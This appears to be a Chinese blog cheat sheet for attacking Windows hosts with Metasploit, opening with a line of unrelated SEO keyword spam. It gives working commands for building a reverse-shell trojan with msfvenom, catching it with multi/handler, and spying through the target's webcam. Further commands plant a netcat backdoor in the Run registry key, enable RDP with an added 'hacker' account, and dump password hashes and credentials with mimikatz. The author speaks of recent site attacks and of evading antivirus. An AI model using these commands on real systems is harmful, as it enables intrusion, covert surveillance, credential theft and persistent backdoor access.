医院网站的建设,公司网站做论坛,英文学习网站,网站建设贰金手指下拉贰壹文章目录前言msfvenom生成远控木马基本系统命令webcam 摄像头命令常用的信息收集脚本注册表设置nc后门开启 rdp添加用户获取哈希mimikatz抓取密码前言
最近打站#xff0c;可以感觉到之前的学的渗透知识忘记很多。。。。。多用多看多练#xff0c;简单回顾一下
msfven…
文章目录前言msfvenom生成远控木马基本系统命令webcam 摄像头命令常用的信息收集脚本注册表设置nc后门开启 rdp添加用户获取哈希mimikatz抓取密码前言
最近打站可以感觉到之前的学的渗透知识忘记很多。。。。。多用多看多练简单回顾一下
msfvenom生成远控木马
msfvenom是用来生成后门的软件在目标主机上执行后门在本地监听上线。
这里就拿windows来举例子 windows可执行程序后门
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost192.168.xx.xx lport4444 -f exe -o demo.exe
-p: payload
payload_name: 系统/架构/作用/方式
lhostkali
lport监听的端口
-f指定输出格式
-ooutput在实际环境中想办法将生成的木马上传到目标主机通过历史漏洞、中间件解析漏洞、等等方式并且用户要有执行权限不然就要先提权了。 下面就要用到最常用的主机监听模块了multi/handle对指定主机指定端口进行监听
use exploit/multi/handler #使用监听模块
set payload windows/x64/meterpreter/reverse_tcp #设置payload不同版本的系统payload不同
set host 192.168.xx.xx #设置kali的ip
set lport 5555 #设置监听的端口
run此时在受害机上执行我们生成的木马大部分情况下是无法直接上传的各种杀软会将其拦截这个时候就需要加壳、免杀等等后续会进行总结就可以成功拿到主机的控制权限。
基本系统命令
sessions #sessions –h 查看帮助
sessions -i ID值 #进入会话 -k 杀死会话
background #将当前会话放置后台
run #执行已有的模块输入run后按两下tab列出已有的脚本
info #查看已有模块信息
getuid # 查看权限
getpid # 获取当前进程的pid
sysinfo # 查看目标机系统信息
ps # 查看当前活跃进程 kill PID值 杀死进程
idletime #查看目标机闲置时间
reboot / shutdown #重启/关机
shell #进入目标机cmd shellwebcam 摄像头命令
webcam_list #查看摄像头
webcam_snap #通过摄像头拍照
webcam_stream #通过摄像头开启视频常用的信息收集脚本
run post/windows/gather/checkvm #是否虚拟机
run post/linux/gather/checkvm #是否虚拟机
run post/windows/gather/forensics/enum_drives #查看分区
run post/windows/gather/enum_applications #获取安装软件信息
run post/windows/gather/dumplinks #获取最近的文件操作
run post/windows/gather/enum_ie #获取IE缓存
run post/windows/gather/enum_chrome #获取Chrome缓存
run post/windows/gather/enum_patches #补丁信息
run post/windows/gather/enum_domain #查找域控注册表设置nc后门
upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32 #上传nc
reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run #枚举run下的key
reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v lltest_nc -d C:\windows\system32\nc.exe -Ldp 443 -e cmd.exe #设置键值
reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v lltest_nc #查看键值nc -v 192.168.xxx.xxx 443 #攻击者连接nc后门开启 rdp添加用户
enable_rdp 脚本
run post/windows/manage/enable_rdp #开启远程桌面
run post/windows/manage/enable_rdp USERNAMEhacker PASSWORD123456 #添加用户
run post/windows/manage/enable_rdp FORWARDtrue LPORT6662 #将3389端口转发到6662脚本位于/usr/share/metasploit-framework/modules/post/windows/manage/enable_rdp.rb 通过 enable_rdp.rb 脚本可知开启 rdp 是通过 reg 修改注册表添加用户是调用 cmd.exe 通过 net user 添加端口转发是利用的 portfwd 命令
获取哈希
run post/windows/gather/smart_hashdump #从SAM导出密码哈希 #需要SYSTEM权限
mimikatz抓取密码
load mimikatz #help mimikatz 查看帮助 wdigest #获取Wdigest密码 mimikatz_command -f samdump::hashes #执行mimikatz原始命令 mimikatz_command -f sekurlsa::searchPasswords 。。。。待补充
